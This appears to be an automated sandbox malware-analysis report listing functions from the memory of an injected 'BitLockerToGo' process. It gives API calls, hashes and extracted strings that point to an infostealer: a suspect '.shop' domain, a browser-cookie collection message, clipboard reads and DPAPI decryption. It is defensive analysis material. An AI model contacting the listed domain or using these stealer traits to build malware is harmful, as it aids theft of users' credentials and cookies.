Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: %$'
API String ID: 834300711-1094439344
Opcode ID: 1f5adba189e331c3fdee092ab79cb603ecc6f04cc3c97dd42b9494696651a569
Instruction ID: bb2f002d6590c4a57b36e77c09de657ceb9d8d7663811c1214362cf30773b05e
Opcode Fuzzy Hash: 1f5adba189e331c3fdee092ab79cb603ecc6f04cc3c97dd42b9494696651a569
Instruction Fuzzy Hash: 7DA19AB14483818FC714CF68C890A6BF7E2BF85318F148A5DE4968B391E375D956CF82

Function 02EE7E80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02EE7F04

Strings

f543, xrefs: 02EE7EC6

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: f543
API String ID: 1279760036-424919641
Opcode ID: 64f5eb00e60473e25decf7751701070b182dca105e535054652df9d09a1c5df2
Instruction ID: ebe23475a34c89832c66b71b9234433fc6134086e21f89e1f298e950c7dd5d61
Opcode Fuzzy Hash: 64f5eb00e60473e25decf7751701070b182dca105e535054652df9d09a1c5df2
Instruction Fuzzy Hash: E001AD305083409BC708EF18C4A0B2AFBF5EF86318F108A1CE5D907690C731AD24CB86

Function 02EC7189 Relevance: 3.1, Strings: 2, Instructions: 571COMMON

Download Yara Rule

Strings

L, xrefs: 02EC7259
Z, xrefs: 02EC73D3

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: L$Z
API String ID: 0-4237817082
Opcode ID: 0fd853a44aaabd5461eee6c7e64f17836d4ce42116697c550878065ac7198c73
Instruction ID: d86363778969d2ceffc2b41c13e63b281c3ad0737f899144b933651c0dea473a
Opcode Fuzzy Hash: 0fd853a44aaabd5461eee6c7e64f17836d4ce42116697c550878065ac7198c73
Instruction Fuzzy Hash: 5002DDB19483408BD715DF28C840A6BB7E6FF89308F149A2DE9C987351E739D916CF92

Function 02EC6CB0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

\1N3, xrefs: 02EC6D8E
Z-K/, xrefs: 02EC6D34

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Z-K/$\1N3
API String ID: 0-2464779077
Opcode ID: c6b7481d0b887f9440a07e3e62ed9191a3080d53193984f333bdad8afb0e8644
Instruction ID: b51b5bb6d35419ff361efcee067620a39f6ed0b217bb3ec542f036e3a7b2f7be
Opcode Fuzzy Hash: c6b7481d0b887f9440a07e3e62ed9191a3080d53193984f333bdad8afb0e8644
Instruction Fuzzy Hash: 7F81E171A883409FD764CF14C890B6BB3B6FFC9318F549A1CF9A95B281D7709905CB92

Function 02EC72DD Relevance: 1.7, Strings: 1, Instructions: 465COMMON

Download Yara Rule

Strings

Z, xrefs: 02EC73D3

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Z
API String ID: 0-1505515367
Opcode ID: 148eb6199354f63ccc81127b538e6b9c317286ca33ffbd917ddd1eb5bd288588
Instruction ID: 3dd7332a786f0a8e56f67976ec8849c2017c8b3050296299fab1be12ede0f802
Opcode Fuzzy Hash: 148eb6199354f63ccc81127b538e6b9c317286ca33ffbd917ddd1eb5bd288588
Instruction Fuzzy Hash: 0FE1BAB29483408BD715CF68C85066BB7E6FF89308F149A6DE9C587350E738D916CF92

Function 02EC91C0 Relevance: 1.7, Strings: 1, Instructions: 421COMMON

Download Yara Rule

Strings

21, xrefs: 02EC923E

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 21
API String ID: 0-4252452532
Opcode ID: 21a3b6dc0004107fa80922ad1db4cedfc9fad71c1bb461ae58a74e6a191cfdad
Instruction ID: 182bc5403af7bf7729b9ad416efd76e1d6ca98006e2620e023649ca27a4e494a
Opcode Fuzzy Hash: 21a3b6dc0004107fa80922ad1db4cedfc9fad71c1bb461ae58a74e6a191cfdad
Instruction Fuzzy Hash: 5CC1A9B15483118BC718CF58C89176BB7F1FF86358F149A1CE8964B392E7B4D906CB92

Function 02EE9C20 Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 02EE9CD9

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0b321a0ed9aaf7264e3f340f10ce9aba7a5e499c25db0bd491aed4dd6c06af40
Instruction ID: aa178d6f755b5800b736f5fd5921dddd1c92be751c0456450c6d3c5afa85854a
Opcode Fuzzy Hash: 0b321a0ed9aaf7264e3f340f10ce9aba7a5e499c25db0bd491aed4dd6c06af40
Instruction Fuzzy Hash: 6921FD71949201DBD700AF2AD844BABBBEAEFC5314F04C928E9D917295D731E850CBC2

Function 02EE9D10 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02EEC710,005C003F,00000002,00000018,?), ref: 02EE9D36

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 02EEA479 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

/.)(, xrefs: 02EEA547

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)(
API String ID: 0-2587180175
Opcode ID: 207924ac385353aff347f3af37a001f81b1e62ff4fa945a16df4536e3a9adc4e
Instruction ID: fe1aaa0ede302cd564042c2cf5019f4902e89b2f742b1115303edf00d61aefa9
Opcode Fuzzy Hash: 207924ac385353aff347f3af37a001f81b1e62ff4fa945a16df4536e3a9adc4e
Instruction Fuzzy Hash: 64A17874681B41CFDB24CF1AD5A0722B7F2EB89308F58D96CD5A78BB56C334A855CB80

Function 02EB3260 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4cb6ca75af563d59e382566aa964881376af0bf0278eb48fd2634a1082d9b09
Instruction ID: 2fc9cd0a639b1a578898933492ebc34ebcb45f702fa7c51a00802197a30562d3
Opcode Fuzzy Hash: e4cb6ca75af563d59e382566aa964881376af0bf0278eb48fd2634a1082d9b09
Instruction Fuzzy Hash: 4451B1B0884B05DFD7018F2AE80975BBBA0FF8031CF044978E55E96A50D735E9B4CB96

Function 02EC2E51 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d279e27be20da3a684a6cd3b8a2e5bdece897f10d841426908e877044c6dd109
Instruction ID: 9f2ba09c21eb969eafa6745151db24569aa8e4a5d88d04b657ac1220c17f1287
Opcode Fuzzy Hash: d279e27be20da3a684a6cd3b8a2e5bdece897f10d841426908e877044c6dd109
Instruction Fuzzy Hash: 0941A271A806408FD7669F65D980B6773E6AF8A304F58E82CEA4683740E731F452CB41

Function 02EBAB80 Relevance: 49.8, APIs: 1, Strings: 27, Instructions: 811
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 02EBACFE

Strings

', xrefs: 02EBB185
}, xrefs: 02EBB09D
y, xrefs: 02EBB08D
7, xrefs: 02EBB1C5
E, xrefs: 02EBB0C1
q, xrefs: 02EBB0AD
!, xrefs: 02EBB16D
-, xrefs: 02EBB15D
3, xrefs: 02EBB1B5
/, xrefs: 02EBB165
9, xrefs: 02EBB18D
1, xrefs: 02EBB1AD
+, xrefs: 02EBB155
u, xrefs: 02EBB0BD
{, xrefs: 02EBB095
#, xrefs: 02EBB175
5, xrefs: 02EBB1BD
C, xrefs: 02EBB0B9
), xrefs: 02EBB14D
=, xrefs: 02EBB19D
callosallsaospz.shop, xrefs: 02EBAFE6, 02EBB661
?, xrefs: 02EBB1A5
,, xrefs: 02EBB139
w, xrefs: 02EBB0C5
%, xrefs: 02EBB17D
s, xrefs: 02EBB0B5
;, xrefs: 02EBB195

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: !$#$%$'$)$+$,$-$/$1$3$5$7$9$;$=$?$C$E$callosallsaospz.shop$q$s$u$w$y${$}
API String ID: 1029625771-4226161811
Opcode ID: e7212606d3358eede155e74bcfd091a4a47a2c027274c128b69d970fd0628ce9
Instruction ID: 99e3c4dd005c6bde6954ea9986fbffd49018a860f00e57b86e626f4a1e2d2312
Opcode Fuzzy Hash: e7212606d3358eede155e74bcfd091a4a47a2c027274c128b69d970fd0628ce9
Instruction Fuzzy Hash: 8E826D70508B80CED722CF38D484756BFE1AF16318F089A9DD8EA8F796D375A445CB62

Function 02EDA3F6 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 77
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 02EDA52E

Strings

P, xrefs: 02EDA484
i, xrefs: 02EDA464
z, xrefs: 02EDA494
H, xrefs: 02EDA434
D, xrefs: 02EDA404
K, xrefs: 02EDA424
B, xrefs: 02EDA444
I, xrefs: 02EDA414
k, xrefs: 02EDA474
e, xrefs: 02EDA454

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: B$D$H$I$K$P$e$i$k$z
API String ID: 2525500382-4014294549
Opcode ID: 395eea914c7a45ea6ccefce512f0b7b7ec93f3a7dc3d042594d9deb7dfaa0bae
Instruction ID: c93e9e93eaff25815a9a5eba95200865ac56740dfaaf960fce6df9d540ccd52c
Opcode Fuzzy Hash: 395eea914c7a45ea6ccefce512f0b7b7ec93f3a7dc3d042594d9deb7dfaa0bae
Instruction Fuzzy Hash: EB41B77015C7C28ED331CB288458B9BBFE16BD6318F448A6DE5E88B392C7759506CB53

Function 02EB9980 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 02EB9A74

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 02EB9A3C

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: ExitProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 621844428-780655312
Opcode ID: 101abea7e0389cc5d0e1096213491d15cd3a07c1efa0b5c92e27c0aa04a18109
Instruction ID: f56b4b84d681132109e744c69487b7d2aa5c68bcf02b2aad8c3165b0e37d8472
Opcode Fuzzy Hash: 101abea7e0389cc5d0e1096213491d15cd3a07c1efa0b5c92e27c0aa04a18109
Instruction Fuzzy Hash: 29113A7048C341CEDF42AF64C2043EF7BE4AF46358F01E919E69A86186D7798249CF93

Function 02EE7F42 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 02EE7FE2

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7d1a2a79500d84bab4524fba6dab50a05b7a181d93499414b9ff31010e1d0ff9
Instruction ID: 411ca45e40c02978b70a4985748d034c52a32f165f41412437e0741a5f3eb47c
Opcode Fuzzy Hash: 7d1a2a79500d84bab4524fba6dab50a05b7a181d93499414b9ff31010e1d0ff9
Instruction Fuzzy Hash: 90118F70A84241CFD7208F15E490B05F7B6FB89309F79C8A9C6941BB59D332A863CF80

Function 02EE2DB8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 02EE2DD3

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 19eb015ada81edec3095d9c8ade5169d727e838976df0f432897e237ef0bb852
Instruction ID: fd51ee2ea612411eeffb13c88ce97fadb95ef257c5ccae872b9406b1d2a9f4da
Opcode Fuzzy Hash: 19eb015ada81edec3095d9c8ade5169d727e838976df0f432897e237ef0bb852
Instruction Fuzzy Hash: 45E012B95447018FC758FF7CD55055A7BE0FB48300F41482CE89AC7341D730A9548F16

Non-executed Functions

Function 02ECE086 Relevance: 23.7, APIs: 1, Strings: 12, Instructions: 903COMMON

Download Yara Rule

Strings

(EkY, xrefs: 02ECE163
[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02ECE23F
u1FD, xrefs: 02ECE155
,$Z", xrefs: 02ECE17F
]I_`, xrefs: 02ECE171
[XJ', xrefs: 02ECE16A
mQS], xrefs: 02ECE15C
BL@H, xrefs: 02ECE14E
H09=, xrefs: 02ECE19B
'Ux{, xrefs: 02ECE186
-124, xrefs: 02ECE1A9
{)F4, xrefs: 02ECE1A2

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 'Ux{$(EkY$,$Z"$-124$BL@H$H09=$[XJ'$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$]I_`$mQS]$u1FD${)F4
API String ID: 0-1645084748
Opcode ID: f6db5e44b3d030e68b8eeb65848df8c9fa4ed2ccb656e55f01804f9b69de1f85
Instruction ID: 05194dfcbf39eee8a1939e4755f10010cd6efacf375ab368c24d758793361306
Opcode Fuzzy Hash: f6db5e44b3d030e68b8eeb65848df8c9fa4ed2ccb656e55f01804f9b69de1f85
Instruction Fuzzy Hash: 44628B75680B01CFD768CF1AC590A22B7F2FF89314B5889ACD5968BB91D735F852CB40

Function 02EDED00 Relevance: 9.2, APIs: 6, Instructions: 163clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02EDED5B
GetWindowLongW.USER32 ref: 02EDED84
GetClipboardData.USER32 ref: 02EDED96
GlobalLock.KERNEL32 ref: 02EDEDB2

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$DataGlobalLockLongOpenWindow
String ID:
API String ID: 2401467216-0
Opcode ID: d380ec9faeeeedda812431b8456d2bd816cfc94b8b040062a181a9af87bd4853
Instruction ID: c597d6a93eb324ef13f7eaa26f68b8a0372e35c04c5686d48e694f3a4edf4225
Opcode Fuzzy Hash: d380ec9faeeeedda812431b8456d2bd816cfc94b8b040062a181a9af87bd4853
Instruction Fuzzy Hash: 816179B0548B40DFD321DF39C448756BBF0AB0A314F04DA5DE89A8B791D735B859CBA2

Function 02EBA000 Relevance: 9.1, Strings: 7, Instructions: 386COMMON

Download Yara Rule

Strings

ZTRZ, xrefs: 02EBA1D8
\AYL, xrefs: 02EBA405
nM, xrefs: 02EBA1F8
MQOH, xrefs: 02EBA1A8
ADXY, xrefs: 02EBA40D
SQMP, xrefs: 02EBA1A0
TPFR, xrefs: 02EBA1C0

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ADXY$MQOH$SQMP$TPFR$ZTRZ$\AYL$nM
API String ID: 0-3512707261
Opcode ID: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
Instruction ID: 54e86cfbe01e9fea4297355a9bb7d6fcba7e18ba58568a49de3c14fc6211b2fc
Opcode Fuzzy Hash: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
Instruction Fuzzy Hash: 2ED18CB05083808FC716CF29C4907ABFFE1AF96218F189A6DE4D99B352C7399445CB96

Function 02EC82CB Relevance: 8.1, Strings: 6, Instructions: 552COMMON

Download Yara Rule

Strings

Kk$[, xrefs: 02EC886B
uHN;, xrefs: 02EC8863
j_]X, xrefs: 02EC887B
nn n, xrefs: 02EC8873
NrJB, xrefs: 02EC885B
fc, xrefs: 02EC895C

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Kk$[$NrJB$fc$j_]X$nn n$uHN;
API String ID: 0-2328874454
Opcode ID: 76c2841b8b5880d92410b60abcb3369d13172f3f4f1eaf3d32813d18c15f484e
Instruction ID: 4bd6645f300287463d11f57463a4377dda1287270f0350545ccc455425314020
Opcode Fuzzy Hash: 76c2841b8b5880d92410b60abcb3369d13172f3f4f1eaf3d32813d18c15f484e
Instruction Fuzzy Hash: 2412C47154C3908FD725CF24C6907ABBBE2BF96308F289A5DE4D68B381D7359406CB52

Function 02ED4BF0 Relevance: 5.5, Strings: 4, Instructions: 549COMMON

Download Yara Rule

Strings

/.)(, xrefs: 02ED515A
F\F[, xrefs: 02ED4C05
UUmP, xrefs: 02ED4C1A
^D^C, xrefs: 02ED4C13

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)($F\F[$UUmP$^D^C
API String ID: 0-1522875139
Opcode ID: 25a8b894078910cef9370c0aa04e88f0101ddc63f24d047d464489ccd0618556
Instruction ID: 898f73afeef23d9cd54cddad3c9f922ef0d2669bf8df12e29fcb6123952e48f5
Opcode Fuzzy Hash: 25a8b894078910cef9370c0aa04e88f0101ddc63f24d047d464489ccd0618556
Instruction Fuzzy Hash: 7002ABB1544B008FC728CF29D490B63B7F2AF8A308F14996DD5AA8BB91D734F856CB40

Function 02EE8880 Relevance: 4.4, Strings: 3, Instructions: 627COMMON

Download Yara Rule

Strings

/.)(, xrefs: 02EE88F8
/.)(, xrefs: 02EE89F4, 02EE8AD7
/.)(, xrefs: 02EE8A46

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)($/.)($/.)(
API String ID: 0-1945924264
Opcode ID: 49b999f2b87ce15058b32fcd7ca1402a2f2b51e3de3637aa4c13c823dc0c252b
Instruction ID: 75de7b0618a553dc3fdead969ee1e1c4a6ca52f6a547a0ab4374b26549f3ac37
Opcode Fuzzy Hash: 49b999f2b87ce15058b32fcd7ca1402a2f2b51e3de3637aa4c13c823dc0c252b
Instruction Fuzzy Hash: 4C22AE716493419FCB18CF18C490B6ABBE2FF89308F18DA6CE5968B361D731E805CB52

Function 02ED33B6 Relevance: 4.1, Strings: 3, Instructions: 348COMMON

Download Yara Rule

Strings

/&.7, xrefs: 02ED36D4
/.)(, xrefs: 02ED3808
JI, xrefs: 02ED3412

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /&.7$/.)($JI
API String ID: 0-2390188726
Opcode ID: b21b9ff85261c5a67f071af38d867ef1ad90a57a75c97f6a69be066ae19aeeb3
Instruction ID: 9f7026a46a3346fc4dbf70bf59cd9293225fd6fd1755508922bb8fd99e90285b
Opcode Fuzzy Hash: b21b9ff85261c5a67f071af38d867ef1ad90a57a75c97f6a69be066ae19aeeb3
Instruction Fuzzy Hash: DAC187B5988381CFD724CF14D89076BBBE2FFC6304F04996CE6998B291D375A845CB92

Function 02EC4E68 Relevance: 3.4, Strings: 2, Instructions: 898COMMON

Download Yara Rule

Strings

q5K7, xrefs: 02EC4FF3
@-./, xrefs: 02EC5001

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @-./$q5K7
API String ID: 0-1573048203
Opcode ID: eeed21de94568a43906effbdf53e8aca5e670eab7935ceedbe6a466ab83fce3f
Instruction ID: 7e510f223d70219bbcad134358e2bf700eaa9e345dd709c4f1fda87798a7b264
Opcode Fuzzy Hash: eeed21de94568a43906effbdf53e8aca5e670eab7935ceedbe6a466ab83fce3f
Instruction Fuzzy Hash: D0524775640B018FD728CF28C991B62B7F2FF8A314F54996CD9AA8BA91D734F811CB50

Function 02ED41A0 Relevance: 3.0, Strings: 2, Instructions: 473COMMON

Download Yara Rule

Strings

", xrefs: 02ED4464
", xrefs: 02ED438B

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: 53a827f5a577707896cd0954447cacffb42af77b40a9b892d2eccdbbc3246c88
Instruction ID: f64dc6061950070c90e0ebb6a0f22c9c74cca4909a3a3397cd6a4f331b1c6a26
Opcode Fuzzy Hash: 53a827f5a577707896cd0954447cacffb42af77b40a9b892d2eccdbbc3246c88
Instruction Fuzzy Hash: ADE1C031A883818FD314CF28D45076AB7E2BFDA324F599A5DE5E5872D1C3349992CB02

Function 02ECB360 Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

89, xrefs: 02ECB3B3
i3g, xrefs: 02ECB50B

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 89$i3g
API String ID: 0-683074060
Opcode ID: bab5a3a35564c6fd232d7e6060d56c6c06a291e5187238fad36e23e09f1b30c4
Instruction ID: c1b8cb3bacd183cfe29026445d2616e1c9d0cb17e78f5ed6d345902af357b32c
Opcode Fuzzy Hash: bab5a3a35564c6fd232d7e6060d56c6c06a291e5187238fad36e23e09f1b30c4
Instruction Fuzzy Hash: 8D6150B05083409FD310DF19C58162BBBF5EF8A358F149A1CE4E89B3A0E378C906CB96

Function 02EEB160 Relevance: 2.3, Strings: 1, Instructions: 1062COMMON

Download Yara Rule

Strings

F~8;, xrefs: 02EEB4E6

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: F~8;
API String ID: 0-1740687480
Opcode ID: ddab2099646a4f438af18789844248bc4adc82dec50485aeaeef5863f8ab887a
Instruction ID: 2e6df858aa7721b88d4e72079469bf36a701245c5ec2c4b1297c086cacc29d96
Opcode Fuzzy Hash: ddab2099646a4f438af18789844248bc4adc82dec50485aeaeef5863f8ab887a
Instruction Fuzzy Hash: 8A72AB35A88201CFC718CF29D49066AFBF2FBC9318F5989ADD58A87751D735E891CB80

Function 02EEB350 Relevance: 2.2, Strings: 1, Instructions: 946COMMON

Download Yara Rule

Strings

F~8;, xrefs: 02EEB4E6

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: F~8;
API String ID: 0-1740687480
Opcode ID: 870992526226b9a939bbd8b1020d16679b65bccb844294115f43bc12b6761282
Instruction ID: 0e2254e0d47f19c211fbd188a30c44f43352cdd562057c54bc2e83909df8eba2
Opcode Fuzzy Hash: 870992526226b9a939bbd8b1020d16679b65bccb844294115f43bc12b6761282
Instruction Fuzzy Hash: 4362BC34A88201CFC714CF29D49066AFBF2FB8A318F59C9ADD59A8B741D735E851CB80

Function 02ECD810 Relevance: 1.7, APIs: 1, Instructions: 249comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(02EEF748,00000000,00000001,02EEF738), ref: 02ECD839

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e242509ccad85ffb4123d6d7b86d43f4e71594c1c47533cd8271100ff3a0235b
Instruction ID: 62f7b0da552ee7c5a19b064d8e9fdc8036f8aa1a5637b81e1ae71fc7b61bb031
Opcode Fuzzy Hash: e242509ccad85ffb4123d6d7b86d43f4e71594c1c47533cd8271100ff3a0235b
Instruction Fuzzy Hash: C35107B5A842009BDB249FA4CC86BA373B5FF91758F24916CFA458B390F776E801C751

Function 02EC5871 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

:Y>_, xrefs: 02EC5947

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

